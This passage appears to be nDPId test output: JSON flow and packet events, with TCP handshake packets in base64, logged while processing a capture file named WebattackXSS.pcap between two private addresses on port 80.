-00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347151520,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347151520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82ilAAD4G66asEAABwKgKMtOEAFDVpkFaAAAAAKACchDXgQAAAgQFtAQCCAoBOZtzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ04RMTDZ61aZBW6AScSDkzQAAAgQFtAQCCAoD42zpATmbcwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1499347151521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347151521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02ipAAD4G662sEAABwKgKMtOEAFDVpkFbTEw2e4AQAOWD1QAAAQEICgE5m3MD42zp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347152786,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347152786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lJhAAD4GMTisEAABwKgKMtOSAFAXpgg3AAAAAKACchDNWwAAAgQFtAQCCAoBOZyvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ05Ji9R5fF6YIOKAScSDa3AAAAgQFtAQCCAoD424mATmcrwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1499347152787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347152787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lJlAAD4GMT+sEAABwKgKMtOSAFAXpgg4YvUeYIAQAOV55AAAAQEICgE5nK8D424m"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347155346,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347155346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8btxAAD4GVvSsEAABwKgKMtOsAFCnAfHzAAAAAKACchBRqQAAAgQFtAQCCAoBOZ8vAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ06xcmZfGpwHx9KAScSDpngAAAgQFtAQCCAoD43CmATmfLwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1499347155347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347155347,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bt1AAD4GVvusEAABwKgKMtOsAFCnAfH0XJmXx4AQAOWIpgAAAQEICgE5ny8D43Cm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347156630,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347156630,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OChAAD4GjaisEAABwKgKMtO6AFAdhZhYAAAAAKACchAzcgAAAgQFtAQCCAoBOaBwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ07o+DQO9HYWYWaAScSB8vAAAAgQFtAQCCAoD43HnATmgcAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1499347156631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347156631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OClAAD4Gja+sEAABwKgKMtO6AFAdhZhZPg0DvoAQAOUbxAAAAQEICgE5oHAD43Hn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347159323,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347159323,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ly1AAD4GlqOsEAABwKgKMtPUAFBviYw8AAAAAKACchDqzgAAAgQFtAQCCAoBOaMRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ09Q7Unbob4mMPaAScSDBBwAAAgQFtAQCCAoD43SIATmjEQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ly5AAD4GlqqsEAABwKgKMtPUAFBviYw9O1J26YAQAOVgDgAAAQEICgE5oxID43SI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347160581,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160581,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eT9AAD4GTJGsEAABwKgKMtPiAFBG+91zAAAAAKACchDA3AAAAgQFtAQCCAoBOaRMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0+J0ull0RvvddKAScSB55wAAAgQFtAQCCAoD43XCATmkTAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1499347160582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347160582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eUBAAD4GTJisEAABwKgKMtPiAFBG+910dLpZdYAQAOUY7wAAAQEICgE5pEwD43XC"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 